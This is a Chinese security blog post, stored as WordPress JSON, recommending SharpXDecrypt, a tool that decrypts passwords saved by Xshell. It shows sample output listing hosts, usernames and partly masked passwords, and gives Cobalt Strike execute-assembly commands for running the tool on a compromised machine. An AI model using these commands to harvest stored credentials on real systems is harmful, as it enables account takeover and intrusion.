{"id":1011,"date":"2022-11-13T23:58:37","date_gmt":"2022-11-13T15:58:37","guid":{"rendered":"https:\/\/blog.langsasec.cn\/?p=1011"},"modified":"2022-11-14T22:07:33","modified_gmt":"2022-11-14T14:07:33","slug":"sharpxdecrypt","status":"publish","type":"post","link":"https:\/\/blog.langsasec.cn\/index.php\/2022\/11\/13\/sharpxdecrypt\/","title":{"rendered":"\u5de5\u5177\u63a8\u8350\u2014\u2014SharpXDecrypt"},"content":{"rendered":"<h2><span class=\"ez-toc-section\" id=\"%e5%89%8d%e8%a8%80\"><\/span>\u524d\u8a00<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u4e0a\u56de\u53d1\u4e86<a href=\"https:\/\/mp.weixin.qq.com\/s?__biz=MzI1ODM1MjUxMQ==&amp;mid=2247488652&amp;idx=1&amp;sn=47143ad82fcc32797bce7e24a8d2f17d&amp;chksm=ea08209cdd7fa98a0362c37cace6421a4dff942b64e2084024ee8ae31ff74d9d27d9997ab489&amp;scene=178&amp;cur_album_id=2470766670736015360#rd\">\u5de5\u5177\u63a8\u8350\u2014\u2014SharpDecryptPwd<\/a>\uff0c\u53c8\u53d1\u73b0\u4e86\u8fd9\u4e2a\uff0c\u8fd9\u4e2a\u662f\u53c2\u8003SharpDecryptPwd\u5f00\u53d1\u7684\u53e6\u4e00\u4e2a\u5de5\u5177\u3002<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%e7%ae%80%e4%bb%8b\"><\/span>\u7b80\u4ecb<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Xshell\u5168\u7248\u672c\u51ed\u8bc1\u4e00\u952e\u6062\u590d\u5de5\u5177\uff0c\u9488\u5bf9Xshell\u5168\u7248\u672c\u5728\u672c\u5730\u4fdd\u5b58\u7684\u5bc6\u7801\u8fdb\u884c\u89e3\u5bc6\uff0c\u5305\u62ec\u6700\u65b0\u76847\u7cfb\u5217\u7248\u672c\u3002<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%e9%a1%b9%e7%9b%ae%e5%9c%b0%e5%9d%80\"><\/span>\u9879\u76ee\u5730\u5740<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<blockquote>\n<p><a href=\"https:\/\/github.com\/JDArmy\/SharpXDecrypt\">https:\/\/github.com\/JDArmy\/SharpXDecrypt<\/a><\/p>\n<\/blockquote>\n<h2><span class=\"ez-toc-section\" id=\"%e4%bd%bf%e7%94%a8%e6%96%b9%e6%b3%95\"><\/span>\u4f7f\u7528\u65b9\u6cd5<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h4><span class=\"ez-toc-section\" id=\"cmdexe-%e8%87%aa%e5%8a%a8%e5%af%bb%e6%89%besession%e8%b7%af%e5%be%84\"><\/span>cmd.exe \u81ea\u52a8\u5bfb\u627esession\u8def\u5f84<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<pre class=\"prettyprint linenums\" ><code>C:\\Users\\asus\\Desktop\\DEV\\SharpXDecrypt\\bin\\Debug&gt; .\\SharpXDecrypt.exe\n\nXshell\u5168\u7248\u672c\u51ed\u8bc1\u4e00\u952e\u5bfc\u51fa\u5de5\u5177!(\u652f\u6301\u6700\u65b0Xshell 7\u7cfb\u5217\u7248\u672c!)\nAuthor: 0pen1\nGithub: https:\/\/github.com\/JDArmy\n[!] WARNING: For learning purposes only,please delete it within 24 hours after downloading!\n\n[*] Start GetUserPath....\n  UserPath: E:\\NetSarang Computer\\xshell6\n  UserPath: C:\\Users\\asus\\Documents\\NetSarang Computer\\7\n[*] Get UserPath Success !\n\n[*] Start GetUserSID....\n  Username: asus\n  userSID: S-1-5-21-736521517-423******97-1340300005-1001\n[*] GetUserSID Success !\n\n  XSHPath: E:\\NetSarang Computer\\xshell6\\Xshell\\Sessions\\192.168.1.110.xsh\n  Host: 192.168.1.110\n  UserName: wwwuser\n  Password: www*******Aqx\n  Version: 6.0\n\n  XSHPath: C:\\Users\\asus\\Documents\\NetSarang Computer\\7\\Xshell\\Sessions\\192.168.1.110.xsh\n  Host: 192.168.1.110\n  UserName: wwwuser\n  Password: ww********Aqx\n  Version: 7.1\n\n  XSHPath: C:\\Users\\asus\\Documents\\NetSarang Computer\\7\\Xshell\\Sessions\\Tokyo.xsh\n  Host: 198.13.51.134\n  UserName: root\n  Password: W8*********PN__%\n  Version: 7.1<\/code><\/pre>\n<h4><span class=\"ez-toc-section\" id=\"cmdexe-%e6%8c%87%e5%ae%9asession%e8%b7%af%e5%be%84\"><\/span>cmd.exe \u6307\u5b9asession\u8def\u5f84<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<pre class=\"prettyprint linenums\" ><code>C:\\Users\\asus\\Desktop\\DEV\\SharpXDecrypt\\bin\\Release&gt; .\\SharpXDecrypt.exe &quot;C:\\Users\\asus\\Documents\\NetSarang Computer\\7\\Xshell\\Sessions&quot;\n\nXshell\u5168\u7248\u672c\u51ed\u8bc1\u4e00\u952e\u5bfc\u51fa\u5de5\u5177!(\u652f\u6301Xshell 7.0+\u7248\u672c)\nAuthor: 0pen1\nGithub: https:\/\/github.com\/JDArmy\n[!] WARNING: For learning purposes only,please delete it within 24 hours after downloading!\n\n[*] Start GetUserSID....\n  Username: asus\n  userSID: S-1-5-21-736521517-4232353097-1340300005-1001\n[*] GetUserSID Success !\n\n  XSHPath: C:\\Users\\asus\\Documents\\NetSarang Computer\\7\\Xshell\\Sessions\\192.168.1.110.xsh\n  Host: 192.168.1.110\n  UserName: wwwuser\n  Password: www*******qx\n  Version: 7.1\n\n  XSHPath: C:\\Users\\asus\\Documents\\NetSarang Computer\\7\\Xshell\\Sessions\\\u65b0\u5efa\u4f1a\u8bdd.xsh\n  Host: 127.0.0.1\n  UserName: root\n  Password: 78******6\n  Version: 7.1\n\n[*] read done!<\/code><\/pre>\n<h4><span class=\"ez-toc-section\" id=\"cobalt-strike\"><\/span>Cobalt Strike<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<pre class=\"prettyprint linenums\" ><code>execute-assembly \/path\/to\/SharpXDecrypt.exe\nexecute-assembly \/path\/to\/SharpXDecrypt.exe  &quot;C:\\Users\\asus\\Documents\\NetSarang Computer\\7\\Xshell\\Sessions&quot;<\/code><\/pre>\n<h2><span class=\"ez-toc-section\" id=\"%e8%8e%b7%e5%8f%96\"><\/span>\u83b7\u53d6<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<blockquote>\n<p>\u5173\u6ce8\u6d6a\u98d2sec\u56de\u590d<code>SharpXDecrypt<\/code>\u83b7\u53d6\u5feb\u901f\u4e0b\u8f7d\u5730\u5740<\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>\u524d\u8a00 \u4e0a\u56de\u53d1\u4e86\u5de5\u5177\u63a8\u8350\u2014\u2014SharpDecryptPwd\uff0c\u53c8\u53d1\u73b0\u4e86\u8fd9\u4e2a\uff0c\u8fd9\u4e2a\u662f\u53c2\u8003SharpDecryptPw [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[36],"tags":[],"class_list":["post-1011","post","type-post","status-publish","format-standard","hentry","category-tools"],"_links":{"self":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/1011","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/comments?post=1011"}],"version-history":[{"count":2,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/1011\/revisions"}],"predecessor-version":[{"id":1059,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/1011\/revisions\/1059"}],"wp:attachment":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/media?parent=1011"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/categories?post=1011"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/tags?post=1011"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}